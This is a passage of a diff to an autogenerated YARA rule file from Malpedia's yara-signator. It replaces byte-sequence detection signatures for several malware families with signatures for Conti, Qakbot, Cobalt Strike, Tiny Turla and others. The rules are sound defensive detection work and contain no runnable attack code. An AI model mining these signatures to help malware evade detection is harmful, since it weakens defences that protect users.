+		$sequence_7 = { 8b6c2414 03c2 8a4d00 8a18 }
+		$sequence_8 = { eb22 85f6 741c 8a46ff }
+		$sequence_9 = { c68424240200000d e8???????? 83ec10 8d9424a0000000 8bcc 89a424c4000000 52 }
 
 	condition:
-		7 of them and filesize < 212992
+		7 of them and filesize < 163840
 }
-rule MALPEDIA_Win_Icondown_Auto : FILE
+rule MALPEDIA_Win_Conti_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5373046f-833e-5b65-887b-89e409444e78"
+		id = "0b096496-c6ee-577a-814c-51565da6533c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.icondown"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.icondown_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.conti"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.conti_auto.yar#L1-L249"
 		license_url = "N/A"
-		logic_hash = "bd300aef1bbb9e18b32c6db589be33a644549d928eba04fbddb21d95cf446793"
+		logic_hash = "dcbcb23c478cd81647ea44a976b8893f9822f8475b35052b849cd9e3172bedaa"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -139244,34 +139740,52 @@ rule MALPEDIA_Win_Icondown_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c7861401000001000000 e8???????? 8bf0 395e58 c74654df614300 7531 }
-		$sequence_1 = { b97f000000 33c0 8dbc246d010000 889c246c010000 f3ab 66ab aa }
-		$sequence_2 = { ff15???????? 8b442404 6a01 8b4c240c 83ec10 8bd4 }
-		$sequence_3 = { 7403 8b4004 50 6a00 6803130000 51 ff15???????? }
-		$sequence_4 = { 3bd1 7f3f 8b542410 8a0a 8a5a01 3acb 7732 }
-		$sequence_5 = { 68???????? ff15???????? 392d???????? 7e6f 8d04ad00000000 399c80641e4500 8d3480 }
-		$sequence_6 = { ff2485bc2f4000 56 8d44246c 55 50 e8???????? 83c40c }
-		$sequence_7 = { 896c2420 896c2424 894c242c ff15???????? 8b5c2430 8b4c2428 }
-		$sequence_8 = { 50 ff74240c e8???????? c3 b8???????? c3 }
-		$sequence_9 = { 8a4e24 f6c101 7409 8b4e1c 85c9 7408 }
+		$sequence_0 = { 8a06 8d7601 0fb6c0 83e839 }
+		$sequence_1 = { 57 bf0e000000 8d7101 8d5f71 }
+		$sequence_2 = { 803900 7530 53 56 57 bf0e000000 }
+		$sequence_3 = { 0f1f4000 8a07 8d7f01 0fb6c0 b92a000000 2bc8 }
+		$sequence_4 = { 753f 53 bb0e000000 57 8d7e01 }
+		$sequence_5 = { 8975fc 803e00 7541 53 bb0a000000 }
+		$sequence_6 = { 6a00 6a00 6800100000 68???????? }
+		$sequence_7 = { 57 bf0a000000 8d7101 8d5f75 }
+		$sequence_8 = { e8???????? 85c0 7508 6a01 ff15???????? }
+		$sequence_9 = { 50 6a20 ff15???????? 68???????? ff15???????? 68???????? }
+		$sequence_10 = { 8b4d08 e8???????? 6a00 ff15???????? 33c0 }
+		$sequence_11 = { 3d00005000 7605 b800005000 6a00 8d4c2418 }
+		$sequence_12 = { 3cff 0f859d000000 807f0125 0f8593000000 }
+		$sequence_13 = { 8bb6007d0000 85f6 75ef 6aff 6a01 }
+		$sequence_14 = { ff15???????? 89460c ff15???????? 8bc8 8b460c }
+		$sequence_15 = { ffd0 85c0 7519 c705????????0a000000 }
+		$sequence_16 = { 6aff 6a01 8d4108 50 }
+		$sequence_17 = { ff15???????? ff75f4 ff15???????? ff75f0 ff15???????? 5e }
+		$sequence_18 = { 7519 c705????????0a000000 e9???????? b801000000 }
+		$sequence_19 = { 3ce9 7412 3cff 0f859d000000 }
+		$sequence_20 = { 48894e08 4863c8 488d1c4b e8???????? }
+		$sequence_21 = { e8???????? 33c0 e9???????? 488bc8 48899c24a8010000 }
+		$sequence_22 = { 0f8ef5000000 49895b18 498973d0 be00005000 }
+		$sequence_23 = { c7442420000000f0 4c8d45a1 33d2 488bcf ffd0 85c0 }
+		$sequence_24 = { e8???????? 33d2 33c9 ffd0 8bf8 }
+		$sequence_25 = { e8???????? 33d2 41b8107d0000 488bc8 }
+		$sequence_26 = { 42884c0501 49ffc0 4983f80c 72af }
+		$sequence_27 = { 2bc8 884c3c21 48ffc7 4883ff04 }
 
 	condition:
-		7 of them and filesize < 5505024
+		7 of them and filesize < 520192
 }
-rule MALPEDIA_Win_Jaff_Auto : FILE
+rule MALPEDIA_Win_Qakbot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "dbcef186-9c65-5f08-b104-968bef8d25a5"
+		id = "420c4e6b-5192-5ecb-8603-21219ca27f7b"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.jaff"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.jaff_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.qakbot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.qakbot_auto.yar#L1-L545"
 		license_url = "N/A"
-		logic_hash = "9a989bf52696173e65a2ed9949d803cbd331438ebfe4f480f702f5669476fb7a"
+		logic_hash = "3dc61bc81008dc8bd15332e5573d386c22408e9f81e4f285b87a6fbf5a5bafcc"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -139283,32 +139797,86 @@ rule MALPEDIA_Win_Jaff_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 13c9 66f3ab 8b7de8 8d043f 50 6a08 }
-		$sequence_1 = { 7402 d8ca d1e8 7411 }
-		$sequence_2 = { 8b5598 52 6a00 ffd3 50 ffd6 }
-		$sequence_3 = { 66833c4200 7508 3bce 7506 }
-		$sequence_4 = { 8a470c 51 6a08 8975bc 8845c0 ffd3 }
-		$sequence_5 = { 8b5590 52 6a00 ffd7 50 ffd6 53 }
-		$sequence_6 = { 90 668b340a 668931 83c102 ff4df8 75f1 50 }
-		$sequence_7 = { 0f82a5feffff 8b4d14 51 6a00 }
-		$sequence_8 = { 8b55f8 8945d4 8b450c 8b08 0fbe0411 }
-		$sequence_9 = { 6a08 c745e000000000 c745e40a000000 c645e801 ffd3 50 }
+		$sequence_0 = { 33c0 7402 ebfa e8???????? }
+		$sequence_1 = { 7402 ebfa 33c0 7402 }
+		$sequence_2 = { 7402 ebfa eb06 33c0 }
+		$sequence_3 = { e8???????? 33c9 85c0 0f9fc1 41 }
+		$sequence_4 = { 50 e8???????? 8b06 47 }
+		$sequence_5 = { 59 59 6afb e9???????? }
+		$sequence_6 = { 740d 8d45fc 6a00 50 e8???????? 59 }
+		$sequence_7 = { 50 8d8534f6ffff 6a00 50 }
+		$sequence_8 = { 8945fc e8???????? 8bf0 8d45fc 50 e8???????? }
+		$sequence_9 = { 50 e8???????? 59 59 6afe 58 }
+		$sequence_10 = { 33c0 e9???????? 33c0 7402 }
+		$sequence_11 = { 7402 ebfa e9???????? 6a00 }
+		$sequence_12 = { 7cef eb10 c644301c00 ff465c 8b465c }
+		$sequence_13 = { e8???????? 83c410 33c0 7402 }
+		$sequence_14 = { 85c0 750a 33c0 7402 }
+		$sequence_15 = { 7507 c7466401000000 83f840 7507 }
+		$sequence_16 = { 837dfc00 750b 33c0 7402 }
+		$sequence_17 = { e8???????? e8???????? 33c0 7402 }
+		$sequence_18 = { 833d????????00 7508 33c0 7402 }
+		$sequence_19 = { c7466001000000 33c0 40 5e }
+		$sequence_20 = { 7402 ebfa 837d1000 7408 }
+		$sequence_21 = { 80ea80 8855f0 e8???????? 0fb64df7 }
+		$sequence_22 = { 7eeb 83f861 7c05 83f87a 7ee1 }
+		$sequence_23 = { 83f841 7c05 83f85a 7eeb }
+		$sequence_24 = { e8???????? 59 85c0 7505 6afe }
+		$sequence_25 = { 8d45bc 6a20 50 e8???????? 6a00 8d45bc 50 }
+		$sequence_26 = { e8???????? 833822 7505 83c8ff }
+		$sequence_27 = { b301 eb0c 813800300000 b302 7202 }
+		$sequence_28 = { 7418 813800200000 7304 b301 }
+		$sequence_29 = { c1e81e 33448afc 69c06589076c 03c1 89048a ff82c0090000 81bac009000070020000 }
+		$sequence_30 = { 50 8d45d8 50 8d45d4 50 8d45ec 50 }
+		$sequence_31 = { ff10 85c0 750b ff15???????? e9???????? }
+		$sequence_32 = { 56 e8???????? 8b45fc 83c40c 40 }
+		$sequence_33 = { 83f801 7513 85c9 7507 e8???????? 8bc8 890d???????? }
+		$sequence_34 = { 6a00 6800600900 6a00 ff15???????? a3???????? }
+		$sequence_35 = { e8???????? 33c0 c3 55 8bec 51 51 }
+		$sequence_36 = { 50 ff5508 8bf0 59 }
+		$sequence_37 = { 6a00 58 0f95c0 40 50 }
+		$sequence_38 = { c3 33c9 3d80000000 0f94c1 }
+		$sequence_39 = { 85c0 750c 57 ff15???????? 6afe 58 }
+		$sequence_40 = { 57 ff15???????? 33c0 85f6 0f94c0 }
+		$sequence_41 = { 6a02 ff15???????? 8bf8 83c8ff }
+		$sequence_42 = { 5e 33c0 c9 c3 55 8bec }
+		$sequence_43 = { 56 e8???????? 83c40c 8d4514 50 }
+		$sequence_44 = { e8???????? e8???????? e8???????? e8???????? e8???????? 85c0 7405 }
+		$sequence_45 = { c7871002000001000000 8bc3 eb02 33c0 }
+		$sequence_46 = { 7505 83c8ff eb51 8b0a }
+		$sequence_47 = { 8a040a 8801 48ffc1 84c0 740e 49ffc8 }
+		$sequence_48 = { c745df03000000 8975f3 c745f705000000 83780406 }
+		$sequence_49 = { e8???????? ba05000000 48898424180a0000 488d4c2420 }
+		$sequence_50 = { e8???????? 6a00 8d45d4 50 68???????? }
+		$sequence_51 = { 5d c3 33c9 66890c46 }
+		$sequence_52 = { 803c3000 75f9 5f 5e 5d c3 c6040600 }
+		$sequence_53 = { 894c245c 0f847afdffff e9???????? 31c0 8b8c2480000000 8b542450 }
+		$sequence_54 = { c7042400000000 c744240400b00300 c744240800100000 c744240c04000000 }
+		$sequence_55 = { 89442428 8b442420 8b485c 8b542418 8b32 01ce }
+		$sequence_56 = { 19ce 8a8c2495000000 80f12a 8a2d???????? 89842488000000 }
+		$sequence_57 = { 0f48c1 33c9 66894c7efe 85c0 791d }
+		$sequence_58 = { 8b85c0faffff 85c0 7407 50 ff15???????? }
+		$sequence_59 = { 8b542474 8b742440 035610 8944243c 89542438 eb55 8b442464 }
+		$sequence_60 = { 7437 8b45d0 c745c801000000 85db 741d 8d50f8 8d4f08 }
+		$sequence_61 = { 890c24 89442410 e8???????? 8b4c2414 890c24 8944240c }
+		$sequence_62 = { e9???????? 8b44246c 8b4c2468 01c8 8b942480000000 8b74247c }
+		$sequence_63 = { 8b442418 8b4c2450 8a1401 8a74243b 80cefa }
 
 	condition:
-		7 of them and filesize < 106496
+		7 of them and filesize < 4883456
 }
-rule MALPEDIA_Win_Lockbit_Auto : FILE
+rule MALPEDIA_Win_Geminiduke_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6f3385a8-2122-56da-ae67-c32b266b8bf0"
+		id = "02859369-3674-5db5-af28-f984437e92a6"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lockbit"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.lockbit_auto.yar#L1-L209"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.geminiduke"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.geminiduke_auto.yar#L1-L149"
 		license_url = "N/A"
-		logic_hash = "f9cfb53a3d4bcd6fa0ccd32df2c087610c559fdf32ede817bcfaa297f48ef893"
+		logic_hash = "43a7a4a4b6211d31a7f1edbc5b1056c5050268b2a916bbe7f7b62319abe9e067"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -139322,42 +139890,36 @@ rule MALPEDIA_Win_Lockbit_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 49 8bc1 5f 59 5d }
-		$sequence_1 = { c20800 33c0 40 c1e006 }
-		$sequence_2 = { 4f 85ff 75c1 5f }
-		$sequence_3 = { 8d45f8 50 8d45fc 50 ff75fc ff75f4 }
-		$sequence_4 = { 03d0 90 85c0 75e1 8bc2 5e 5a }
-		$sequence_5 = { 33c0 8d7df0 33c9 53 0fa2 8bf3 5b }
-		$sequence_6 = { 8b7508 b961000000 66ad 90 6683f841 720b 6683f85a }
-		$sequence_7 = { 83ec10 53 56 57 33c0 8d7df0 33c9 }
-		$sequence_8 = { f745f800000002 740c 5f 5e b801000000 5b }
-		$sequence_9 = { 33d0 8bc1 c1e810 0fb6c0 c1e208 }
-		$sequence_10 = { 720b 6683f85a 7705 6683c820 90 02f1 }
-		$sequence_11 = { 2d04040404 49 75f4 8b7d0c be40000000 33db 55 }
-		$sequence_12 = { 8d8550fdffff 50 6a00 ff15???????? }
-		$sequence_13 = { 8bf3 5b 8907 897704 894f08 89570c f745f800000002 }
-		$sequence_14 = { 8d45f4 50 6a00 6a00 ff15???????? }
-		$sequence_15 = { e8???????? 85c0 7502 eb59 8d3c47 6a00 }
-		$sequence_16 = { 0f28c8 660f73f904 660fefc8 0f28c1 660f73f804 660fefc1 }
-		$sequence_17 = { 6a00 6a00 6800000040 ff75d4 }
-		$sequence_18 = { 7413 83e910 660f6f0c0e 660f3a0fc10f 660f7f040f }
-		$sequence_19 = { 234df0 094ddc 0155dc 8b55f4 8bf2 c1ce0b 8bca }
+		$sequence_0 = { 68???????? e8???????? 83c404 50 6801000080 ff15???????? }
+		$sequence_1 = { 8b7c2410 8b442414 8b4c2418 f3aa 5f 59 }
+		$sequence_2 = { 6819000200 6a00 68???????? e8???????? }
+		$sequence_3 = { 50 51 57 8b7c2410 }
+		$sequence_4 = { 034590 03c8 894dd0 8b45f8 }
+		$sequence_5 = { 034584 8b8d64ffffff c1e907 8b9564ffffff c1e219 0bca }
+		$sequence_6 = { 03459c 03c8 894ddc 8b45fc }
+		$sequence_7 = { 034590 8b8d70ffffff c1e907 8b9570ffffff }
+		$sequence_8 = { 8ac1 0430 8ad1 80ea0a 80fa05 7705 }
+		$sequence_9 = { 337704 33e8 8b442410 c1ee12 83e601 33ee 896f24 }
+		$sequence_10 = { 80f919 7703 b001 c3 }
+		$sequence_11 = { 668907 8bc2 5a 5b 59 }
+		$sequence_12 = { 57 51 53 52 33db 8b7c2418 8b74241c }
+		$sequence_13 = { 66894704 8bc2 c1e010 668b4602 33d2 f7f3 }
 
 	condition:
-		7 of them and filesize < 2049024
+		7 of them and filesize < 327680
 }
-rule MALPEDIA_Win_Moriagent_Auto : FILE
+rule MALPEDIA_Win_Tiny_Turla_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8ea17c80-9deb-5afe-98a3-751e4ae48a8a"
+		id = "cbc30228-0e4c-5d86-b8e7-6b44a66c67bf"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.moriagent"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.moriagent_auto.yar#L1-L152"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tiny_turla"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.tiny_turla_auto.yar#L1-L117"
 		license_url = "N/A"
-		logic_hash = "b07e11158ac51efd9de0395dc805b23dd409bb1c9d15248d2eea5cac8417e1fb"
+		logic_hash = "b2b8f5dd8c24eb98beaa2120ec3707c14594804ade8ee0e436beafc526cfc343"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -139371,76 +139933,85 @@ rule MALPEDIA_Win_Moriagent_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { b802000000 eb05 b801000000 33ff }
-		$sequence_1 = { 8d8d84efffff e9???????? 8b542408 8d420c 8b8ab0eeffff }
-		$sequence_2 = { e8???????? 488bd8 488d15b5630600 488bcf }
-		$sequence_3 = { 7202 8b12 8bca c78540ffffff00000000 c78544ffffff0f000000 c68530ffffff00 8d7101 }
-		$sequence_4 = { 8d041e 2bfe 57 ff75fc 2bdf 894104 }
-		$sequence_5 = { 8d47ff 880e 46 eb0c b802000000 }
-		$sequence_6 = { e8???????? 488bd8 488d15c4320500 488d8da0000000 }
-		$sequence_7 = { e8???????? 488bd8 488d15bb6d0500 488d4d28 }
-		$sequence_8 = { e8???????? 488bd8 488d15cdae0600 488bcf }
-		$sequence_9 = { e8???????? 488bd8 488d15cc390500 488d4d58 }
-		$sequence_10 = { 83fa10 0f82c6feffff 8b8d84efffff 42 }
-		$sequence_11 = { 2bc1 83c0fc 83f81f 0f87a9020000 52 51 }
-		$sequence_12 = { e8???????? 488bd8 488d15b2780500 488d4d28 e8???????? }
-		$sequence_13 = { 0f438d6cefffff 898dfceeffff 3bf8 731d 2bc7 50 8d0439 }
-		$sequence_14 = { e8???????? 488bd8 488d15caad0600 488bcf }
+		$sequence_0 = { 7521 488d4c2450 44896d7f e8???????? }
+		$sequence_1 = { 48c744242000000000 488bd7 ff15???????? 85c0 7540 8b4c2450 }
+		$sequence_2 = { e8???????? 488bf8 4885c0 0f8403010000 41b80e000000 }
+		$sequence_3 = { 4c8be8 4885c0 0f84d8010000 488b5628 }
+		$sequence_4 = { 4889742458 48897c2430 e8???????? 498907 }
+		$sequence_5 = { 488bcf e8???????? 413bc6 7407 }
+		$sequence_6 = { 66894308 488d5b10 413bfe 72d3 488d5e18 488bcb }
+		$sequence_7 = { 740e ff15???????? 48c74310ffffffff 33c0 e9???????? 4533c9 4c8d442450 }
+		$sequence_8 = { 488bcf e8???????? 8bc8 8bd8 e8???????? 4c8bf0 }
+		$sequence_9 = { 488d5e10 488bcb e8???????? 4c8933 32db e9???????? 488bcf }
 
 	condition:
-		7 of them and filesize < 1347904
+		7 of them and filesize < 51200
 }
-rule MALPEDIA_Win_Unidentified_073_Auto : FILE
+rule MALPEDIA_Win_Cobalt_Strike_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0ba61f73-e46a-5f54-853f-f1f3b502ee26"
-		date = "2022-08-05"
-		modified = "2022-08-08"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_073"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_073_auto.yar#L1-L125"
+		id = "1adbbac8-6bfc-5d06-9cad-1cba809f72a0"
+		date = "2024-10-31"
+		modified = "2024-11-11"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.cobalt_strike_auto.yar#L1-L236"
 		license_url = "N/A"
-		logic_hash = "8100472ca712d569bbcdb570af72e3f13986092b4d8ee8e3873da55bef76232d"
+		logic_hash = "516cb9bee5b249c5388cc4f59266e6454e546903dcdda98af8bfbaa75e737812"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20220805"
-		malpedia_hash = "6ec06c64bcfdbeda64eff021c766b4ce34542b71"
-		malpedia_version = "20220808"
+		malpedia_rule_date = "20241030"
+		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
+		malpedia_version = "20241030"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d8538ffffff 6a00 c746180f000000 8bce }
-		$sequence_1 = { c684242801000019 e8???????? 68???????? 8d8c24c0000000 e8???????? 6aff }
-		$sequence_2 = { 8bce c7461400000000 50 c6460400 e8???????? 83ec1c 8bf4 }
-		$sequence_3 = { 7846 8b451c 8b0e 2bc1 3bc3 7c53 }
-		$sequence_4 = { 8b0d???????? 894df8 eb09 8b55f8 83ea01 8955f8 837df800 }
-		$sequence_5 = { 6a00 8d8424dc000000 50 8d4c2454 e8???????? 83ec1c 8d84240c010000 }
-		$sequence_6 = { 8bec 51 894dfc c705????????90664a00 833d????????00 741c }
-		$sequence_7 = { 6bd103 8982a0784a00 68???????? 8b45fc 50 ff15???????? }
-		$sequence_8 = { 0fb74df8 894de0 668b55e0 668955f8 0fb745fc 0fb74df8 3bc1 }
-		$sequence_9 = { 57 6aff 68???????? 50 ff15???????? }
+		$sequence_0 = { e9???????? eb0a b801000000 e9???????? }
+		$sequence_1 = { 3bc7 750d ff15???????? 3d33270000 }
+		$sequence_2 = { ff30 4f ff15???????? 83c604 8b06 }
+		$sequence_3 = { ff30 8b35???????? e8???????? eb17 }
+		$sequence_4 = { eb0b 391f 7504 83670400 8b7f20 85ff 75f1 }
+		$sequence_5 = { eb0b 8b45d4 83c010 8945d4 eb84 e9???????? }
+		$sequence_6 = { e8???????? 8bf8 59 59 85ff 7408 ff36 }
+		$sequence_7 = { e8???????? ff75fc ff15???????? 03fe 2bf8 57 ff75fc }
+		$sequence_8 = { ff15???????? 85c0 741d ff15???????? 85c0 }
+		$sequence_9 = { e9???????? 833d????????01 7505 e8???????? }
+		$sequence_10 = { 85c0 7405 e8???????? 8b0d???????? 85c9 }
+		$sequence_11 = { 8bd0 e8???????? 85c0 7e0e }
+		$sequence_12 = { ffc3 413bdf 7cde 488b742428 8b85f0170000 }
+		$sequence_13 = { 81fe00000008 7607 e8???????? eb08 448bce e8???????? 8bd8 }
+		$sequence_14 = { e8???????? 85c0 743d ffc3 83fb20 }
+		$sequence_15 = { c744242003000000 ff15???????? 488903 4883f8ff 74b2 8364246000 }
+		$sequence_16 = { 817c2404fca45307 751d 488b442418 8b00 }
+		$sequence_17 = { 8b442450 4c8d4c2420 41b820000000 8bd0 488b4c2448 488b442440 }
+		$sequence_18 = { 8b4038 488b4c2430 482bc8 488bc1 4889442430 eb5c }
+		$sequence_19 = { c644246345 c644246478 c644246541 c644246600 c644244856 }
+		$sequence_20 = { 4863403c 4889442428 48837c242840 722f 48817c242800040000 7324 }
+		$sequence_21 = { 488d0481 4889442448 488b442448 8b00 488b8c2498000000 4803c8 488bc1 }
+		$sequence_22 = { 488b4c2458 488d440118 48890424 488b442458 0fb74006 }
+		$sequence_23 = { 488b1424 0fb712 6623d1 0fb7ca 0fb7c9 488b542408 }
 
 	condition:
-		7 of them and filesize < 1974272
+		7 of them and filesize < 1015808
 }
-rule MALPEDIA_Win_Yanluowang_Auto : FILE
+rule MALPEDIA_Win_Plurox_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "80b6830b-5b54-5c8d-ad9b-1e91ef44f5d3"
+		id = "00819bcc-51e2-53a8-9308-9b7887ed6069"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.yanluowang"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.yanluowang_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.plurox"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.plurox_auto.yar#L1-L112"
 		license_url = "N/A"
-		logic_hash = "6212a7300d814763a89ad52de44e628c3e76a732777f6c6e8d98550e60e1baf9"
+		logic_hash = "fa579257df25509063a4df447932e0b25e6ea4c45a2af23b4dfc95998427a19a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -139454,32 +140025,32 @@ rule MALPEDIA_Win_Yanluowang_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7416 8bc2 8bca 83e03f c1f906 6bc030 03048d38034600 }
-		$sequence_1 = { 74da 83e801 74d5 83e801 0f85a5fdffff 0fbe41ff 8d04c560984400 }
-		$sequence_2 = { 668945e8 8b45d4 886de5 8b148538034600 8a4c1a2d f6c104 7419 }
-		$sequence_3 = { 69f307536554 8b55cc 8d1c0f 8b45b4 c1c208 0fb6c0 }
-		$sequence_4 = { 68???????? 51 50 8d45a4 50 ffb5e4fcffff 8d8d3cffffff }
-		$sequence_5 = { 8d8dc0eeffff e8???????? c645fc18 b8ffffff7f 8b8dd0eeffff 2bc1 83f830 }
-		$sequence_6 = { ff75b8 ff75c8 e8???????? 6a00 6a00 }
-		$sequence_7 = { 8ad8 83fa10 722c 8b4ddc 42 8bc1 81fa00100000 }
-		$sequence_8 = { 388557f4ffff 7431 8b85c0f5ffff 8d8d98f5ffff 51 3b85c4f5ffff 7410 }
-		$sequence_9 = { 8b4f50 8bf1 8b55ac 8b4754 8b7f58 8b525c 0bca }
+		$sequence_0 = { 0416 128bc606091a f6870f1a000000 e10d 21c9 8918 }
+		$sequence_1 = { 0a20 0816 ec bbf2000000 }
+		$sequence_2 = { 300f 353e0fee3c 031e 2200 }
+		$sequence_3 = { 624a8b 0416 128bc606091a f6870f1a000000 e10d 21c9 }
+		$sequence_4 = { 94 f8 21480e 2a15???????? 6f }
+		$sequence_5 = { 6808486409 58 0000 00e4 0487 58 }
+		$sequence_6 = { 0925???????? 0000 c48dcd713240 89f5 }
+		$sequence_7 = { 0416 128bc606091a f6870f1a000000 e10d }
+		$sequence_8 = { 0442 6808486409 58 0000 }
+		$sequence_9 = { 0d04b8ca08 6af3 dac9 0000 00ee }
 
 	condition:
-		7 of them and filesize < 834560
+		7 of them and filesize < 475136
 }
-rule MALPEDIA_Win_Solarbot_Auto : FILE
+rule MALPEDIA_Win_Blackmagic_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "49174231-2a30-5980-bda7-c8f930d0210d"
+		id = "df0b2b99-699a-561e-81a2-262819321991"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.solarbot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.solarbot_auto.yar#L1-L117"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackmagic"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.blackmagic_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "78704c2bda81ce32f769ec7e509f90cf94c947eb12d602603a0979d813473a0e"
+		logic_hash = "8896e03618f3636d9e8021773bcbae5a5f1f7f57b30da18d455d4ffaf6317ffa"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -139493,32 +140064,32 @@ rule MALPEDIA_Win_Solarbot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c745fc00000000 c745dc18000000 c745e400000000 c745e800000000 }
-		$sequence_1 = { 83ec10 895df0 8975f4 e8???????? 89c6 }
-		$sequence_2 = { 8b55f4 01d0 50 e8???????? }
-		$sequence_3 = { 8b5510 8955fc c745f800000000 6a00 }
-		$sequence_4 = { 8b45f8 8b400c 8b00 8945f4 83c018 8b00 8945fc }
-		$sequence_5 = { 8b4508 8945cc 8b7d0c 8b4510 8b5514 c745c800000000 c745e400000000 }
-		$sequence_6 = { 53 e8???????? 83fe04 750a ff75f0 56 }
-		$sequence_7 = { 0f84be000000 53 e8???????? 89c6 ff75a8 }
-		$sequence_8 = { 8b7508 8b7d0c bb00000000 68cc020000 8d8534fdffff }
-		$sequence_9 = { 89f0 c1e002 038550feffff 8b955cfeffff 8910 81fefa000000 }
+		$sequence_0 = { 488bcb e8???????? 90 41b940000000 458d41e2 488bd7 488bcb }
+		$sequence_1 = { 4883c430 5f c3 b914000000 e8???????? 33c0 488b5c2440 }
+		$sequence_2 = { ba01000000 488bc8 41ff10 90 488b842490020000 4885c0 7433 }
+		$sequence_3 = { 48895890 48895898 885888 48895880 885c2420 488b02 4c8d4c2430 }
+		$sequence_4 = { 488bce e8???????? 4180e603 ba01000000 488bce 41c0e604 483bfa }
+		$sequence_5 = { 8945b7 498b4e08 48894dbf 488b07 488945cf 4585ff }
+		$sequence_6 = { 440f42c1 488b4b60 e8???????? 488b4360 488b4808 48894b70 e9???????? }
+		$sequence_7 = { 488d0dd58f0200 48890b 488d5308 33c9 48890a 48894a08 488d4808 }
+		$sequence_8 = { 4183f805 757c 8b470c 458d487a c744243001000000 4c8d05ed2c0200 89442428 }
+		$sequence_9 = { 4533c0 e8???????? 90 488d0535330300 488903 488bc3 4883c430 }
 
 	condition:
